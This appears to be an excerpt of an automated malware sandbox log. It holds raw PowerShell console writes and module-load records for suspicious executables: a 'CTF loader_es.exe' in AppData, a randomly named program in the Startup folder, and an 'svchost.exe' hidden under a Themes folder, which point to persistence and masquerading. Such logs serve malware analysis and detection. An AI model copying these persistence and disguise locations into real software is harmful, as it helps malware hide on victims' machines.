Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................*.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................U.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................p.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............@.......$.......B.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............@.......$.......w.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............@.......P...............................0......./.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............@.......P...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............@.......................................0.......;...............|.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............@...............!.......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......K.......................0.......G...............".......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............@...............g.......................0.......G.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............@.......................................0.......S.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............@.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............@.......................................0......._...............~.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............@.......P...............................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............@.......P...............................0.......k.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............@.......P...............................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............@.......P...............................0.......w.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@.......P...............................0.......................l.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@.......P...............................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............@...............>.......................0...............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@...............Y.......................0...............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....T.......x.......P.......7.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....T.......x...............u.......................0.......#.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....T.......x.......L...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....T.......x.......................................0......./.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....T.......x.......L...............................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....T.......x.......p.......,.......................0.......;.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......Z.......................0.......G.......x.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....T.......x.......p.......z.......................0.......G.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....T.......x.......L...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....T.......x.......p...............................0.......S.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....T.......x.......p...............................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....T.......x.......@.......'.......................0......._.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....T.......x.......p.......\.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....T.......x.......L...............................0.......k.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.......2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....T.......x.......L...............................0.......w.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......x.......L.......+.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......x.......p.......f.......................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......x.......p...............................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......x.......p...............................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....d.......................S.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....d.......................q.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....d...............................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....d...............................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....d...............................................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....d...............P...............................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......D.......................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....d.......................m.......................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....d...............................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....d...............P...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....d...............................................0......._...............~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....d...............................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....d.......................g.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....d...............................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....d...............................................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......................1.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......................d.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....d...............................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d...............P...............................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............t...............H.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............t...............}.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............t.......................................0......./.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............t.......................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............t...............'.......................0.......;...............|.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............t...............W.......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............t.......................................0.......G.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............t.......................................0.......S.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............t.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............t...............:.......................0......._.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............t...............X.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............t.......................................0.......k.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............t.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............t.......................................0.......w.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............t...............U.......................0.......................l.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............t...............~.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............t.......................................0...............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............t.......................................0...............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............8.......................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............8.......................................0.......#.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............8.......................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............8.......................................0......./.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............8...............2.......................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............8...............Y.......................0.......;.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.........{.....".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............8.......................................0.......G.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............8.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............8.......................................0.......S.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............8...............E.......................0......._...............~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............8...............`.......................0......._.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............8.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............8.......................................0.......k.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........{.....2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............8.......................................0.......w.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......................................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8...............?.......................0.................{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............8...............g.......................0.................{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......................................0.................{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....$...............................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....$.......................+.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....$.......................W.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....$.......................}.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....$...............................................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....$...............................................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......?.......................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....$.......................a.......................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....$...............................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....$...............................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....$...............................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....$...............................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....$.......................V.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....$...............................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....$...............................................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......................}.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$...............................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....$.......................*.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......................K.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............D.......................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............D.......................................0.......#.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............D...............J.......................0......./.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............D...............o.......................0......./.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............D.......................................0.......;...............|.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............D.......................................0.......;.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......h.......".......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............D...............-.......................0.......G.......h...............x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............D...............W.......................0.......S.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............D.......................................0.......S.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............D.......................................0......._...............~.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............D.......................................0......._.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............D.......................................0.......k.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............D...............G.......................0.......k.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......h.......2.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............D.......................................0.......w.......h...............x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............D.......................................0.......................l.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............D.......................................0...............h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............D...............$.......................0...............h...............x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............D...............?.......................0...............h...............x...............
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
